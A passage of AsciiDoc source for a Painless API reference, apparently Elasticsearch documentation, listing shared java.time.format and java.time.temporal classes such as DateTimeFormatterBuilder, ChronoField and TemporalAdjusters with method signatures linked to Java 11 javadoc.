{java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendLiteral(java.lang.String)[appendLiteral](null) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendLocalized(java.time.format.FormatStyle,java.time.format.FormatStyle)[appendLocalized](FormatStyle, FormatStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendLocalizedOffset(java.time.format.TextStyle)[appendLocalizedOffset](TextStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendOffset(java.lang.String,java.lang.String)[appendOffset](null, null) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendOffsetId()[appendOffsetId]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendOptional(java.time.format.DateTimeFormatter)[appendOptional](DateTimeFormatter) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendPattern(java.lang.String)[appendPattern](null) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendText(java.time.temporal.TemporalField)[appendText](TemporalField) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendText(java.time.temporal.TemporalField,java.time.format.TextStyle)[appendText](TemporalField, TextStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendValue(java.time.temporal.TemporalField)[appendValue](TemporalField) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendValue(java.time.temporal.TemporalField,int)[appendValue](TemporalField, int) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendValue(java.time.temporal.TemporalField,int,int,java.time.format.SignStyle)[appendValue](TemporalField, int, int, SignStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendValueReduced(java.time.temporal.TemporalField,int,int,int)[appendValueReduced](TemporalField, int, int, int) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendZoneId()[appendZoneId]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendZoneOrOffsetId()[appendZoneOrOffsetId]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendZoneRegionId()[appendZoneRegionId]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendZoneText(java.time.format.TextStyle)[appendZoneText](TextStyle) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#appendZoneText(java.time.format.TextStyle,java.util.Set)[appendZoneText](TextStyle, Set) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#optionalEnd()[optionalEnd]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#optionalStart()[optionalStart]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#padNext(int)[padNext](int) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#padNext(int,char)[padNext](int, char) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#parseCaseInsensitive()[parseCaseInsensitive]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#parseCaseSensitive()[parseCaseSensitive]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#parseDefaulting(java.time.temporal.TemporalField,long)[parseDefaulting](TemporalField, long) -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#parseLenient()[parseLenient]() -* DateTimeFormatterBuilder {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#parseStrict()[parseStrict]() -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#toFormatter()[toFormatter]() -* DateTimeFormatter {java11-javadoc}/java.base/java/time/format/DateTimeFormatterBuilder.html#toFormatter(java.util.Locale)[toFormatter](Locale) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateTimeParseException]] -==== DateTimeParseException -* {java11-javadoc}/java.base/java/time/format/DateTimeParseException.html#(java.lang.String,java.lang.CharSequence,int)[DateTimeParseException](null, CharSequence, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/format/DateTimeParseException.html#getErrorIndex()[getErrorIndex]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* null {java11-javadoc}/java.base/java/time/format/DateTimeParseException.html#getParsedString()[getParsedString]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DecimalStyle]] -==== DecimalStyle -* static DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#STANDARD[STANDARD] -* static Set {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#getAvailableLocales()[getAvailableLocales]() -* static DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#of(java.util.Locale)[of](Locale) -* static DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#ofDefaultLocale()[ofDefaultLocale]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#getDecimalSeparator()[getDecimalSeparator]() -* char {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#getNegativeSign()[getNegativeSign]() -* char {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#getPositiveSign()[getPositiveSign]() -* char {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#getZeroDigit()[getZeroDigit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#withDecimalSeparator(char)[withDecimalSeparator](char) -* DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#withNegativeSign(char)[withNegativeSign](char) -* DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#withPositiveSign(char)[withPositiveSign](char) -* DecimalStyle {java11-javadoc}/java.base/java/time/format/DecimalStyle.html#withZeroDigit(char)[withZeroDigit](char) - - -[[painless-api-reference-shared-FormatStyle]] -==== FormatStyle -* static FormatStyle {java11-javadoc}/java.base/java/time/format/FormatStyle.html#FULL[FULL] -* static FormatStyle {java11-javadoc}/java.base/java/time/format/FormatStyle.html#LONG[LONG] -* static FormatStyle {java11-javadoc}/java.base/java/time/format/FormatStyle.html#MEDIUM[MEDIUM] -* static FormatStyle {java11-javadoc}/java.base/java/time/format/FormatStyle.html#SHORT[SHORT] -* static FormatStyle {java11-javadoc}/java.base/java/time/format/FormatStyle.html#valueOf(java.lang.String)[valueOf](null) -* static FormatStyle[] {java11-javadoc}/java.base/java/time/format/FormatStyle.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ResolverStyle]] -==== ResolverStyle -* static ResolverStyle {java11-javadoc}/java.base/java/time/format/ResolverStyle.html#LENIENT[LENIENT] -* static ResolverStyle {java11-javadoc}/java.base/java/time/format/ResolverStyle.html#SMART[SMART] -* static ResolverStyle {java11-javadoc}/java.base/java/time/format/ResolverStyle.html#STRICT[STRICT] -* static ResolverStyle {java11-javadoc}/java.base/java/time/format/ResolverStyle.html#valueOf(java.lang.String)[valueOf](null) -* static ResolverStyle[] {java11-javadoc}/java.base/java/time/format/ResolverStyle.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SignStyle]] -==== SignStyle -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#ALWAYS[ALWAYS] -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#EXCEEDS_PAD[EXCEEDS_PAD] -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#NEVER[NEVER] -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#NORMAL[NORMAL] -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#NOT_NEGATIVE[NOT_NEGATIVE] -* static SignStyle {java11-javadoc}/java.base/java/time/format/SignStyle.html#valueOf(java.lang.String)[valueOf](null) -* static SignStyle[] {java11-javadoc}/java.base/java/time/format/SignStyle.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TextStyle]] -==== TextStyle -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#FULL[FULL] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#FULL_STANDALONE[FULL_STANDALONE] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#NARROW[NARROW] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#NARROW_STANDALONE[NARROW_STANDALONE] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#SHORT[SHORT] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#SHORT_STANDALONE[SHORT_STANDALONE] -* static TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#valueOf(java.lang.String)[valueOf](null) -* static TextStyle[] {java11-javadoc}/java.base/java/time/format/TextStyle.html#values()[values]() -* TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#asNormal()[asNormal]() -* TextStyle {java11-javadoc}/java.base/java/time/format/TextStyle.html#asStandalone()[asStandalone]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/format/TextStyle.html#isStandalone()[isStandalone]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-time-temporal"] -=== Shared API for package java.time.temporal -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ChronoField]] -==== ChronoField -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#ALIGNED_DAY_OF_WEEK_IN_MONTH[ALIGNED_DAY_OF_WEEK_IN_MONTH] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#ALIGNED_DAY_OF_WEEK_IN_YEAR[ALIGNED_DAY_OF_WEEK_IN_YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#ALIGNED_WEEK_OF_MONTH[ALIGNED_WEEK_OF_MONTH] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#ALIGNED_WEEK_OF_YEAR[ALIGNED_WEEK_OF_YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#AMPM_OF_DAY[AMPM_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#CLOCK_HOUR_OF_AMPM[CLOCK_HOUR_OF_AMPM] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#CLOCK_HOUR_OF_DAY[CLOCK_HOUR_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#DAY_OF_MONTH[DAY_OF_MONTH] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#DAY_OF_WEEK[DAY_OF_WEEK] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#DAY_OF_YEAR[DAY_OF_YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#EPOCH_DAY[EPOCH_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#ERA[ERA] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#HOUR_OF_AMPM[HOUR_OF_AMPM] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#HOUR_OF_DAY[HOUR_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#INSTANT_SECONDS[INSTANT_SECONDS] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MICRO_OF_DAY[MICRO_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MICRO_OF_SECOND[MICRO_OF_SECOND] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MILLI_OF_DAY[MILLI_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MILLI_OF_SECOND[MILLI_OF_SECOND] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MINUTE_OF_DAY[MINUTE_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MINUTE_OF_HOUR[MINUTE_OF_HOUR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#MONTH_OF_YEAR[MONTH_OF_YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#NANO_OF_DAY[NANO_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#NANO_OF_SECOND[NANO_OF_SECOND] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#OFFSET_SECONDS[OFFSET_SECONDS] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#PROLEPTIC_MONTH[PROLEPTIC_MONTH] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#SECOND_OF_DAY[SECOND_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#SECOND_OF_MINUTE[SECOND_OF_MINUTE] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#YEAR[YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#YEAR_OF_ERA[YEAR_OF_ERA] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#valueOf(java.lang.String)[valueOf](null) -* static ChronoField[] {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#adjustInto(java.time.temporal.Temporal,long)[adjustInto](Temporal, long) -* int {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#checkValidIntValue(long)[checkValidIntValue](long) -* long {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#checkValidValue(long)[checkValidValue](long) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getBaseUnit()[getBaseUnit]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getFrom(java.time.temporal.TemporalAccessor)[getFrom](TemporalAccessor) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getRangeUnit()[getRangeUnit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isSupportedBy(java.time.temporal.TemporalAccessor)[isSupportedBy](TemporalAccessor) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#range()[range]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#rangeRefinedBy(java.time.temporal.TemporalAccessor)[rangeRefinedBy](TemporalAccessor) -* TemporalAccessor {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#resolve(java.util.Map,java.time.temporal.TemporalAccessor,java.time.format.ResolverStyle)[resolve](Map, TemporalAccessor, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#toString()[toString]() - - -[[painless-api-reference-shared-ChronoUnit]] -==== ChronoUnit -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#CENTURIES[CENTURIES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#DAYS[DAYS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#DECADES[DECADES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#ERAS[ERAS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#FOREVER[FOREVER] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#HALF_DAYS[HALF_DAYS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#HOURS[HOURS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MICROS[MICROS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MILLENNIA[MILLENNIA] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MILLIS[MILLIS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MINUTES[MINUTES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MONTHS[MONTHS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#NANOS[NANOS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#SECONDS[SECONDS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#WEEKS[WEEKS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#YEARS[YEARS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#valueOf(java.lang.String)[valueOf](null) -* static ChronoUnit[] {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#addTo(java.time.temporal.Temporal,long)[addTo](Temporal, long) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#between(java.time.temporal.Temporal,java.time.temporal.Temporal)[between](Temporal, Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#getDuration()[getDuration]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDurationEstimated()[isDurationEstimated]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isSupportedBy(java.time.temporal.Temporal)[isSupportedBy](Temporal) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#toString()[toString]() - - -[[painless-api-reference-shared-IsoFields]] -==== IsoFields -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#DAY_OF_QUARTER[DAY_OF_QUARTER] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#QUARTER_OF_YEAR[QUARTER_OF_YEAR] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#QUARTER_YEARS[QUARTER_YEARS] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_BASED_YEAR[WEEK_BASED_YEAR] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_BASED_YEARS[WEEK_BASED_YEARS] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_OF_WEEK_BASED_YEAR[WEEK_OF_WEEK_BASED_YEAR] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-JulianFields]] -==== JulianFields -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/JulianFields.html#JULIAN_DAY[JULIAN_DAY] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/JulianFields.html#MODIFIED_JULIAN_DAY[MODIFIED_JULIAN_DAY] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/JulianFields.html#RATA_DIE[RATA_DIE] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Temporal]] -==== Temporal -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-TemporalAccessor]] -==== TemporalAccessor -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalAdjuster]] -==== TemporalAdjuster -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalAdjusters]] -==== TemporalAdjusters -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#dayOfWeekInMonth(int,java.time.DayOfWeek)[dayOfWeekInMonth](int, DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfMonth()[firstDayOfMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfNextMonth()[firstDayOfNextMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfNextYear()[firstDayOfNextYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfYear()[firstDayOfYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstInMonth(java.time.DayOfWeek)[firstInMonth](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastDayOfMonth()[lastDayOfMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastDayOfYear()[lastDayOfYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastInMonth(java.time.DayOfWeek)[lastInMonth](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#next(java.time.DayOfWeek)[next](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#nextOrSame(java.time.DayOfWeek)[nextOrSame](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#ofDateAdjuster(java.util.function.UnaryOperator)[ofDateAdjuster](UnaryOperator) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#previous(java.time.DayOfWeek)[previous](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#previousOrSame(java.time.DayOfWeek)[previousOrSame](DayOfWeek) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int 